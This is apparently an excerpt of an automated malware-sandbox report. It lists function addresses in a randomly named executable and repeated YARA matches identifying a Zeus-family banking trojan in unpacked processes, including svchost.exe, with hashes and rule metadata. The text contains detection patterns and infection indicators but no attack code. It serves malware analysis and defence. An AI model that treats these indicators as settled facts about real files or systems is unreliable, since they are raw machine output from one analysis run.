Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_010B9D3031_2_010B9D30
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_010EEC0031_2_010EEC00
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_010E7C1031_2_010E7C10
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_010E5C3031_2_010E5C30
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_010B9F5031_2_010B9F50
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_010EF79031_2_010EF790
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_010B3FA031_2_010B3FA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_010EDFA031_2_010EDFA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_010F17C031_2_010F17C0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_010BF7E031_2_010BF7E0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_010F961331_2_010F9613
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_010E565031_2_010E5650
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_010F2EDD31_2_010F2EDD
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_010E06D031_2_010E06D0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 31_2_010EC6D031_2_010EC6D0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_012F893033_2_012F8930
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_0132483033_2_01324830
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_0132681033_2_01326810
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_0132D80033_2_0132D800
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_012F8B5033_2_012F8B50
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_012F2BA033_2_012F2BA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_0132CBA033_2_0132CBA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_0132E39033_2_0132E390
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_012FE3E033_2_012FE3E0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_013303C033_2_013303C0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_0133821333_2_01338213
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_0132425033_2_01324250
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_0131F2D033_2_0131F2D0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_0132B2D033_2_0132B2D0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_0130D57033_2_0130D570
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_013344A033_2_013344A0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_0132A48033_2_0132A480
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_0132FCF033_2_0132FCF0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_01325CD033_2_01325CD0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_0132BF4033_2_0132BF40
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_0131878033_2_01318780
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_0133178033_2_01331780
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_0132663033_2_01326630
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_0132F62033_2_0132F620
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_012AE97033_2_012AE970
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_012D58A033_2_012D58A0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_012CB88033_2_012CB880
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_012D10F033_2_012D10F0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_012C70D033_2_012C70D0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_012CD34033_2_012CD340
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_012B9B8033_2_012B9B80
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_012D0A2033_2_012D0A20
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_012C7A3033_2_012C7A30
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_01299D3033_2_01299D30
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_012C5C3033_2_012C5C30
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_012CEC0033_2_012CEC00
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_012C7C1033_2_012C7C10
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_01299F5033_2_01299F50
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_01293FA033_2_01293FA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_012CDFA033_2_012CDFA0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_012CF79033_2_012CF790
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_0129F7E033_2_0129F7E0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_012D17C033_2_012D17C0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_012D961333_2_012D9613
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_012C565033_2_012C5650
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_012D2EDD33_2_012D2EDD
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_012C06D033_2_012C06D0
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeCode function: 33_2_012CC6D033_2_012CC6D0
Source: C:\Users\user\Desktop\Z8eHwAvqAh.exeProcess token adjusted: SecurityJump to behavior
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7544 -s 744
Source: Z8eHwAvqAh.exeStatic PE information: Number of sections : 13 > 10
Source: svchost.exe.1.drStatic PE information: Number of sections : 13 > 10
Source: Z8eHwAvqAh.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 2.3.svchost.exe.2700000.28.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.39.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.889400.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 25.2.swvGCAxOMikYQeoQzimiprVu.exe.1590000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.16.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 29.2.swvGCAxOMikYQeoQzimiprVu.exe.12a0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 27.2.swvGCAxOMikYQeoQzimiprVu.exe.a42000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.2.Z8eHwAvqAh.exe.406400.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.24.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.14.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 35.2.swvGCAxOMikYQeoQzimiprVu.exe.20d0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.13.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.3eb0000.16.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.27.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.30.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 37.2.swvGCAxOMikYQeoQzimiprVu.exe.ae2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 33.2.swvGCAxOMikYQeoQzimiprVu.exe.1292000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.30.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 1.3.Z8eHwAvqAh.exe.6184c0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 25.2.swvGCAxOMikYQeoQzimiprVu.exe.1532000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 2.3.svchost.exe.2700000.40.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
